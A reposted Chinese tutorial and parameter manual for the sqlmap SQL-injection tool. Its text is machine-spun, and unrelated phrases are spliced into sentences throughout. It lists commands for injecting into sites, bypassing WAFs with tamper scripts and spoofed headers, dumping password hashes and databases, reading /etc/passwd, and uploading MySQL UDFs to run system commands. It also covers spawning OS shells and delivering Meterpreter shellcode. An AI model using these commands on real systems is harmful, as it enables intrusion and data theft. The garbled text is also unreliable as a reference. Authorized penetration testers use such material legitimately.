当前位置: 首页 >> 新闻世界 >> 抓娃娃技巧,SQLMAP深度解析及使用手册,巨潮资讯网 >> 正文

抓娃娃技巧,SQLMAP深度解析及使用手册,巨潮资讯网

2019年03月28日 11:54:47     作者:admin     分类:新闻世界     阅读次数:298    

0X00 布景

写这篇技能文有两个诱因,一是大菲兄弟@大菲哥和朋友从国外买了一篇二十美刀的XSS文章,做了翻译,自古XSS和sql注入是倚天屠龙的对立统一联系,所以有朋友说想看一看sql注入的文章。

二是大约一年前一朋友对sqlmap的运用除了-u参数简直一窍不通,让我给做了河谷镇砸冰个运用手册,刚好绿魔二世拿出来在此根底上进行完善和优化。

我自己是owasp北京分会的负责人,owasp的top10简直一直是sql注入独揽榜首,所以也想就这个时机把sql注入好好给我们聊一聊,本文也参阅了很多长辈的经历,在这里向每个贡献、开草木之心护肤本相曝光源的长辈说一声感谢。

有些朋友说想让聊聊手艺注入,首要我个人手艺注入技巧不是很好,再者手艺注入需求必定的技能堆集和编程根柢,受众有限,后期有时机再深化谈。我个人在浸透上的观念是东西是人类前进的标志,东西的运用肯定是主动化、智能化和量化不可或缺的内容,当然,东西毕竟是死的,好的安全人肯定是左手主动化右手人工。

0X01 SqlMap 介绍及剖析

SQLMAP是一种开源浸透测验东西,可主动履行SQL注入缺点的检测和开发进程,并接收数据库效劳器。它有强壮的检测引擎,针对不同类型的数据库供给多样的浸透测验功用选项,完成数据库辨认、数据获取、拜访DBMS\操作体系乃至经过带外数据衔接的办法履行操作体系的指令。,以及从数据库指纹辨认、从数据库获取数据、拜访底层文件的广泛规模的交换机经过带外衔接在操作体系上履行指令.

sqlmap is anopen source penetration testing tool that automates the process of detectingand exploiting SQL injection flaws and taking over of database servers. Itcomes with a p蒋梦佳owerful detection engine, many niche features for the ultimatepenetration tester and a broad range of switches lasting from database fingerprinting,over data fetching from the database, to accessing the underlying file systemand executing commands on the operating system via out-of-band connections.(源于官方介绍)

SQLMAP支撑的数据包括:MySQL, Oracle,PostgreSQL,Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库。

SQLMAP现在支撑的注入办法包括(默许全进行):

l B: Boolean-based blind SQL injection(布尔型注入)

l E: Error-based SQL injection(报错型注入)

l U: UNION query SQL injection(可联合查询注入)

l S: Stacked queries SQL injection(可多句子查询注入)

l T: Time-based blind SQL injection(依据时刻推迟注入)

l Q: Inline SQL Injection (内联注入)

SQLMAP的功用模块参数由几大类构成(见下表),分别是:

Target:At least one of these options has to be provided to define the target(s) 方针:至少为方针供给一个选项 Request:These options can be used to specify how to connect to the target URL 恳求:这些选项用于指定怎么衔接方针URL的办法 Optimization:These options can be used to optimize the performance of sqlmap 优化:这些选项用来优化sqlmap的功用 Injection:These options can be used to specify which parameters to test for, 注入:这些选项用于指定测验那些参数,供给注入payload和篡改脚本 Detection:These options can be used to customize the detection phase 侦测:这些选项用于侦测阶段的定制化 Techniques:These options can be used to tweak testing of specific SQL injection techniques 技巧:这些选项用于调整特定sql注入技能的技巧 Enumeration:These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can因风守梦 run your own SQL statements 枚举:这些选项可用于枚举后端数据库办理体系信息、表里的数据接口,此外还能够运转你的sql句子 Brute force:These options can be used to run brute force checks 暴力履行:这些选项用于暴力检查 User-defined function injection:These options can be used to create custom user-defined functions 用户界说注入函数:这些选项用于树立用户界说函数 File system access:These options can be used to access the back-end database management system underlying file system 拜访文件体系:这些选项用于拜访后端数据库办理体系的底层文件体系 Operating system access:These options can be used to access the back-end database management system underlying operating system 操作体系衔接:这些选项用于衔接后端DBMS底层的os Windows registry access:These options can be used to access the back-end database management system Windows registry windows 注册表衔接:这些选项用于衔接后端DBMS的windows 注册表 General: These options can be used to set some general working 断了的弦封茗囧菌parameters 通用:这些选项用于设置一些通用参数 SQLMAP 下载及学习地址:

下载:.tar.gz或许.zip

Homepage: http://sqlmap.org

CommitsRSS 学习地址:

qqzhibo

feed:https://github.com/sqlmapproject/sqlmap/commits/master.atom

Issue tracker:https://github.com/sqlmapproject/sqlmap/issues

User’s manual:https://github.com/sqlmapproject/sqlmap/wiki

(FAQ):https://github.com/sqlmapproject/sqlmap/wiki/FAQ

Twitter:@sqlmap

Demos:http://www.youtube.com/user/inquisb/videos

Screenshots:https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

0X02 Sqlmap 运用经历总结

以下参数在进行SQL注入时装备恰当会使得注入进犯事半功倍。以下是笔者对SQLmap 运用的经历总结:

1 在运用-v参数的时分,尽量挑选,3等级,次等级能够显现注入的参数。 例如:sqlmap -v3 -u www.potian.com 2 当一件知道数据库信息的时分,运用-d直接衔接数据库,留意-D是指定方针库,要差异。

例如:-d mysql://POTIAN : 123123 @127.0.0.1:3306/ ORDER 3 当运用Burp或WebScarab保存了日志的时分,想从日志文件中挑选方针,可运用-I运用 肯定途径地址即可。 4 -g能够运用google的查找成果,例如,直接查找uid=,查找具有此参数的站点,直接运用sqlmap调用google成果,例: sqlmap -g inurl:php?uid=。(收集了一些句子,在附表)当需求运用-g inurl:php?uid=等参数时,默许无法拜访,可运用此参数+海外署理办法运用此功用。当署理需求验证的时分,运用-cre指定身份信息,需求运用署理轮巡时,运用文件加载署理设置列表,运用署理轮询也可在对拜访超级微信百笑ip次数进行了验证的场景运用。(鉴于我国国情,不主张运用) 5 效劳端答应的情况下,–method改动默许的http办法,和其他参数合作运用,例如–data,改动为post然后推送数据。 6 默许情况下sqlmap的HTTP恳求头中User-Agent值是:sqlmap/*.*-dev-xxxxxxx( http://sqlmap.org) 能够运用–user-agent参数来指定想运用的UA,一起也能够运用–random-agent参数来随机的从./txt/user-agents.txt中获取。当–level参数设定为3或许3以上的时分,会测验对User-Angent进行注入.别的UA是绕过waf的参数,–user-agent= –random-agent这两个参数可对waf针对歹意ua的防控进行绕过。 7 指定http恳求中的header里的host参数、在恳求中假造referer,有些waf和安全产品等会对refer进行约束,仅答应本站referer,当waf参数对referer进行了约束后,可运用此参数进行绕过。当–level参数设定为3或许3以上的时分会测验对referer注入指定其他的header信息,XFF等,例如strust2-045运用了Content-Type 8 HTTP署理身份验证凭证,可主动运用username:password和秘钥文件,例如有些拜访会运用key文件,集团sso独爱呈现此种场景,在这种身份验证凭证的需求中,也可运用-I参数运用burp等署理记载文件来运用身份凭证 9 设置http恳求距离时刻,在绕抓娃娃技巧,SQLMAP深度解析及运用手册,巨潮资讯网过需求时运用,例如单ip单位时刻拜访多少次,可合作署理和多署理参数运用。超时衔接后的测验距离,默许30s,可手动调整,一般–timeout和–retries合作运用 10 有的网站会对提交的参数进行编码或加密,这时分需求依据某个参数的改变,而修正另个一参数,才干构成正常的恳求,这时能够用–eval参数在每次恳求时依据所写python代码做完修正后恳求。

比方:–eval=”"import hashlib;hash=hashlib.md5(id).hexdigest”"上面的恳求便是每次恳求时依据id参数值,做一次md5后作为hash参数的值。” 11 sqlmap默许测验一切的GET和POST参数,上文说到过,当–level的值大于等于2的时分也会测验HTTP Cookie头的值,大于等于3的时分也会测验User-Agent和HTTP Referer头的值。这时分能够手动指定-p参数设置想要测验的参数。 例如:-p “”id,cookie”"可是有单个参数不想测验的时分能够运用–skip=“user-agent”参数。 12 数值处理:参数:–invalid-bignum –invalid-logical这两个参数对报错数据、无效数据进行更改,例如默许报错UID=-20,能够经过拟定以上参数拟定无效的大数字和逻辑,比方uid=999999999和uid=20 and a=b

参数:–prefix,–suffix在注入的payload的前面或许后边加一些字符,来确保payload的正常履行,例如在句子中增加–prefix “”’)”" –suffix “”AND (’1’=’1″” 13 –tamper可从tamper库里查找相关内容,运用–tamper tamper/*.py办法指定 14 上文屡次解说–level对测验参数的影响,一共有五个等级,默许为1,sqlmap运用的payload能够在payloads.xml中看到,你也能够依据相应的格局增加自己的payload内容,默许也有一些,可定制。

–level的值大于等于2的时分也会测验HTTP Cookie头的值,大于等于3的时分也会测验User-Agent和HTTP Referer头的值,主张最高等级,会更慢、测验参数更杂乱。 15 risk从0-3共有四个危险等级,默许是1,risk1会测验大部分的测验句子,risk2会增加依据事情的测验洪七公叫花鸡加盟句子,3会增加OR句子的注入测验。测验的句子相同能够在payloads.xml中找到,能够自行增加payload。

正告:当运用高等级时,或许会运用drop、update等高危句子对整表、整库形成影响,或许导致更新的整个表,或许形成很大的危险。 16 “sqlmap测验成果取决于回来内容,当页面在改写或更新后,或许导致回来不同的内容,特别是页面有动态内容的情况下。为了防止误报,可指定字符串或许正则表达式来差异原始页面和报错页面(–string参数增加字符串,–regexp增加正则),也能够供给一段字符串在原始页面与true下的页面都不存在的字符串,而false页面中存在的字符串(–not-string增加)。

用户也能够供给true与false回来的HTTP状况码不一样来注入,例如,呼应200的时分为真,呼应401的时分为假,–code=200。 17 默许sqlmap会把BEUSTQ六中注入办法全来一遍,可依据实际情况进行调整,例如可运用时刻推迟,看网站呼应时刻来判别是否有注入,可依据报错判别注入。假如不是很懂,就不必管,尽管时刻长点,但很全面。

B:Boolean-based blind SQL injection(布尔型注入)

E:Error-微光逐星者based SQL injection(报错型注入)

U:UNION query SQL injection(可联合查询注入)

S:Stacked queries SQL injection(可多句子查询注入)镇江小悦悦事情

T: Time-based blind SQL injection(依据时刻推迟注入)

Q: Inline SQL Injection (内联注入)

当运用依据时刻推迟注入的盲注时,时刻运用–time-sec参数设定延时时刻,默许是5秒,能够依据环境记忆调整,比方网络推迟很大,可适当增加延时时刻 18 –union-cols设定的值为一段整数规模,拟定区间,此数值默许为1-10,跟着–levle增加,当为5的时分增加为50,当level等级和取值规模不匹配,在低等级需求更大的规模,可经过设定–union-cols的值来完成。设定union查询运用的字符,默许运用NULL,可是或许会回来失利,–union-char指定UNION查询的字符。指定查询的表,合作上文暴力破解的字符、规模等来详细运用。 19 在一旦注入成功且取得准确信息经过以下详细参数来指定检索、枚举动作和动作履行目标:检索DBMS的指纹特征、数据库、host值、用户身份、并对用户、暗码、权限、人物进行枚举也便是爆炸。然后测验枚举数据库、数据库里的表、数据库里的内容、能够运用count来计算条目等操作。dump和dump-all便是脱裤和全脱的差异,dump某表的十条八条或许没事儿,dump-all注定要浪迹天涯,也便是所谓的从脱裤到跑路的开端,经过-D\-T\-C来拟定索要枚举的库、表、和列,运用-X来扫除不想要的列,特别是有多列且有无意义字段的时分,运用-X可大节操省时刻。 –exclude-sysdbs参数,将不会获取数据库自带的体系库内容,可削减搅扰内容,对-count的运用和枚举信息的运用主张调配此参数来扫除体系库。

当我舜世金服们不想跑路的时分,那么请运用下面内容:

–start=LIMITSTART First query output entry to retrieve指定从第几行开端输出,如:

–start=1

–stop=LIMITSTOP

Last query output entry to retrieve

指定从第几行中止输出

–stop=10

–first=FIRSTCHAR

First query output word character to retrieve

指定从第几个字符开端输出

–first 1

–last=LASTCHAR

Last query output word character to retrieve

指定从第几个字符中止输出–last10 20 暴力检查:猜想检查常见的、通用的表名和列名,可经过下面两个文件进行定制化,暴力破解的表在txt/common-tables.txt文件中,暴力破解的列名在txt/common-columns.txt中 21 对文件体系、操作体系的交互和运用有必要需求相应的权限,前面说到要求具有特定的函数履行特权,一般要求root。针对文件体系的读写:对–file-read装备肯定体系途径,可读取相应文件内容,能够是文本,也能够是二进制,条件是有必要具有相对应特权,已知的是mysql、postgresql和sqlserver。写入也是相同,往远端后台的DBMS里写入一个本地文件,可经过–file-dest指定肯定文件途径。” 当然和上面能够合作运用,当数据库为MySQL,PostgreSQL或Microsoft SQL Server,而且当时用户有权限运用特定的函数。然后经过上面的文件体系办理上传一个库,运用可履行体系指令的sys_exec和sys_eval,乃至xp_cmdshell存储进程 –os-shell参数也能够模仿一个实在的shell,能够输入你想履行的指令。 Meterpreter合作运用 –os-pwn,–os-smbrelay,–os-bof,–priv-esc,–msf-path,–tmp-path合作Meterpreter运用,当时用户有权限运用特定的函数,能够在数据库与进犯者直接树立TCP衔接,这个衔接能够是一个交互式指令行的Meterpreter会话,sqlmap依据Metasploit生成shellcode,四种办法履行它:

1.经过用户自界说的sys_bineval函数在内存中履行Metasplit的shellcode,支撑MySQL和PostgreSQL数据库,参数:–os-pwn。

2.经过用户自界说的函数上传一个独立的payload履行,MySQL和PostgreSQL的sys_exec函数,Microsoft SQL Server的xp_cmdshell函数,参数:–os-pwn。

3.经过SMB进犯(MS08-068)来履行Metasploit的shellcode,当sqlmap获取到的权限足够高的时分(Linux/Unix的uid=0,Windows是Administrator),–os-smbrelay。

4.经过溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储进程(MS09-004),在内存中履行Metasploit的payload,参数:–os-bof。 22 所见即所得,注册表衔接指的是windows体系,信任我们都有windows体系常识,不明白注册表根本就不明白windows体系,一切的windows体系装备在注册表里都可完成,比方敞开长途衔接、比方新建用户、比方组策略装备、比方防火墙等等,reg可对注册表内容进行读取、修正、和删去,上面和下面相合作可完成对指定的key、value、data和类型进行操作。 23 –batch

在运用sqlmap时,有时一些呼应需求用户交互,输入Y、N、skip、quit等,运用此选项可运用默许装备。

–output-dir=

指定输出途径,办法控制台输出过多,无法检查,也便利记载

–gpage=GOOGLEPAGE

如同默许是运用google查找的前100个文件,当运用前面的-g参数,合作此参数指定页面

–identify-waf

进行WAF/IPS/IDS维护测验,现在大约支撑30种产品的辨认

–mobile

运用移动产品UA,把sqlmap伪装成手机,也可运用前面的

-user-agen抓娃娃技巧,SQLMAP深度解析及运用手册,巨潮资讯网t

自己指定

–smart

智能深度启发式扫描,或许会有惊喜呢。

–wizard 和上面的彻底不同,纯新手挑选,一步步让你输入url等参数,根本输入个url就行。 0X03 Sqlmap 实操句子 1 手艺根本检测和判别(在注入点运用or、and等可判别是否有注入点) 原始网页: http://www.potian.com/mysql/product/user_info.php?uid=1 024

结构url1: http://www.potian.com/mysql/product/user_info.php?uid=1 024+AND+1=1

结构url2: http://www.potian.com/mysql/product/user_info.php?uid=1 024+AND+1=1 025 2 根底检测语法 sqlmap.py -u http://www.potian.com/mysql/product/user_info.php?uid=1 024 3 批量检测 “sqlmap.py -m target.txt”,留意target.txt跟sqlmap在侧拉吊环同一个目录下。 4 绕过WAF进行SQL注入 (1)修正\sqlmap\tamper\halfversionedmorekeywords.py return match.group.replace(word, ”/*!0%s” % word) 为:return match.group.replace(word, ”/*!50000%s*/” % word)

(2)修正\sqlmap\xml\queries.xml 为:

(3)运用sqlmap进行注入测验sq抓娃娃技巧,SQLMAP深度解析及运用手册,巨潮资讯网lmap.py -u ” http://www.potian.com/detail.php? id=16″ –tamper “halfversionedmorekeywords.钱龙博亚py”

其它绕过waf脚本办法:sqlmap.py-u “ http://www.potian.com/mysql/product/user_info.phpsr0dn?uid=1 024” –tampertamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

(4)tamper目录下文件详细意义:

space2comment.py

用/**/替代空格

apostrophemask.py

用utf8替代引号

equaltolike.pylike

替代等号

space2dash.py

绕过过滤‘=’ 替换空格字符(”),(’–‘)后跟一个破折号注释,一个随机字符串和一个新行(’n’)

greatest.py

绕过过滤’>’ ,用GREATEST替换大于号。

space2hash.py

空格替换为#号,随机字符串以及换行符

apostrophenullencode.py

绕过过滤双引号,替换字符和双引号。

halfversionedmorekeywords.py

当数据库为mysql异火丹王时绕过防火墙,每个要害字之前增加mysql版别谈论

space2morehash.py

空格替换为#号

以及更多随机字符串

换行符

appendnullbyte.py

在有用负荷完毕方位加载零字节字符编码

ifnull2ifisnull.py

绕过对I特种宗师FNULL过滤,替换相似’IFNULL(A,B)’为’IF(ISNULL(A), B, A)’ space2mssqlblank.py(mssql) 空格替换为其它空符号

base64encode.py

用base64编码替换

space2mssqlhash.py

替换空格

modsecurityversioned.py

过滤空格,包括完好的查询版别注释

space2mysqlblank.py

空格替换其它空白符号(mysql)

between.py

用between替换大于号(>)

space2mysqldash.py

替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

multip抓娃娃技巧,SQLMAP深度解析及运用手册,巨潮资讯网lespaces.py

环绕SQL要害字增加多个空格

space2plus.py

用+替换空格

bluecoat.py

替代空格字符后与一个有用的随机空白字符的SQL句子,然后替换=为like

nonrecursivereplacement.py

两层查询句子,替代SQL要害字

space2randomblank.py

替代空格字符(“”)从一个随机的空白字符可选字符的有用集

sp_password.py

追加sp_password’从DBMS日志的主动含糊处理的有用载荷的结尾

chardoubleencode.py

双url编码(不处理以编码的)

unionalltounion.py

替换UNION ALLSELECT UNION SELECT

charencode.py

url编码

randomcase.py

随机大小写

unmagicquotes.py

宽字符绕过

GPCaddslashes randomcomments.py

用/**/切割sql要害字

charunicodeenco抓娃娃技巧,SQLMAP深度解析及运用手册,巨潮资讯网de.py

字符串unicode编码

securesphere.py

追加特制的字符串

versionedmorekeywords.py

注释绕过 space2comment.py

替换空格字符串(‘‘) 运用注释‘/**/’

halfversionedmorekeywords.py

要害字前加注释 5 URL重写SQL注入测验 value1为测验参数,加“*”即可,sqlmap将会测验value1的方位是否可注入。 sqlmap.py -u ” http://www.potian.com/param1/value1 */param2/value2/” 6 罗列并破解暗码哈希值 当时用户有权限读取包括用户暗码的权限时,sqlmap会现罗列出用户,然后列出hash,并测验破解。 sqlmap.py -u ” http://www.potian.com/无重力战机sqlmap/pgsql/get_int.php?id=1 ” –passwords -v1 7 获取表中的数据个数 sqlmap.py -u ” http://www.potian.com/sqlmap/mssql/iis/get_int.asp?id=1 ” –count -Dtestdb 8 站点爬取 sqlmap.py -u “ http://www.secbang.com “–batch –crawl=3 9 注入时刻预估(依据布尔) sqlmap.py -u “ http://www.secbang.com/sqlmap/oracle/get_int_bool.php?id=1 “-b –eta 10 运用hex防止字符编码导致数据丢掉 sqlmap.py -u “ http://www.secbang.com/pgsql/get_int.php?id=1 ” –banner –hex -v 3 –parse-errors 11 模仿测验手机环境站点 python sqlmap.py -u ” http://www.secbang.com/vuln.php?id=1 ” –mobile 12 智能判别测验 sqlmap.py -u “ http://www.secbang.com/info.php?id=1 “–batch –smart 13 结合burpsuite进行注入 sqlmap.py -r burpsuite 抓包.txt 14 sqlmap 主动填写表单注入 sqlmap.py -u URL –forms sqlmap.py -u URL –forms –dbs sqlmap.py -u URL –forms –current-db sqlmap.py -u URL –forms -D 数据库称号–tables sqlmap.py -u URL –forms -D 数据库称号 -T 表名 –columns sqlmap.py -u URL –forms -D 数据库称号 -T 表名 -Cusername,password –dump 15 读取linux下文件 sqlmap.py-u “url” –file /etc/password 16 sqlmap cookies 注入 sqlmap.py -u “ http://www.potian.com/mysql/product/user_info.php?uid=1 024“–cookies “ssuid=*″ –dbs –level 3 sqlmap.py -u 注入点URL –cookie”id=xx” –level 3 sqlmap.py -u url –cookie “id=xx”–level 3 –tables( 猜表名) sqlmap.py -u url –cookie “id=xx”–level 3 -T 表名 –coiumns sqlmap.py -u url –cookie “id=xx”–level 3 -T 表名 -C username,password –dump 17 衔接mysql数据翻开一个交互shell sqlmap.py -dmysql://potian:123123@ www.potian抓娃娃技巧,SQLMAP深度解析及运用手册,巨潮资讯网.com:3306/sqlmap –sql-shell select @@version; select @@plugin_dir; 18 使用sqlmap上传lib_mysqludf_sys到MySQL插件目录 sqlmap.py -dmysql://potian:123123@ www.potian.com:3306/sqlmap –file-write=d:/tmp/lib_mysqludf_sys.dll–file-dest=d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll CREATE FUNCTION sys_exec RETURNS STRIN抓娃娃技巧,SQLMAP深度解析及运用手册,巨潮资讯网GSONAME ‘lib_mysqludf_sys.dll’ CREATE FUNCTION sys_eval RETURNS STRINGSONAME ‘lib_mysqludf_sys.dll’ select sys_eval(‘ver’); 19 履行shell指令 sqlmap.py -u “url” –os-cmd=”netuser” /*履行net user指令*/ sqlmap.py -u “url” –os-shell /*体系交互的shell*/ 20 延盲君我疼你时注入 sqlmap –dbs -u”url” –delay 0.5 /* 延时0.5秒*/ sqlmap –dbs -u”url” –safe-freq /* 恳求2次*/ 0X04 完毕语

Sql注入并不仅仅对数据库的进犯行为,在整个进犯链条涉及到对操作体系、注册表、体系文件、脚本、插件控件、数据、数据库相关等的掩盖,注入用的好,爱人回家早。

仅以此文献给每一个贡献自己常识的朋友和长辈,以上是笔者从业十余年堆集的一些经历写出来同享给我们,谢谢你对破天、对freebuf的重视。

see you.

开发 操作体系 技能
声明:该文观念仅代表作者自己,搜狐号系信息发布渠道,搜狐仅供给信息存储空间效劳。
除非特别注明,本文『抓娃娃技巧,SQLMAP深度解析及使用手册,巨潮资讯网』来源于互联网、微信平台、QQ空间以及其它朋友推荐等,非本站作者原创。 本站作者admin不对本文拥有版权,如有侵犯,请投诉。我们会在72小时内删除。 但烦请转载时请标明出处:“本文转载于『火车品牌-优惠购信息-火车沿线本地新闻』,原文地址:http://www.railerband.com/articles/1327.html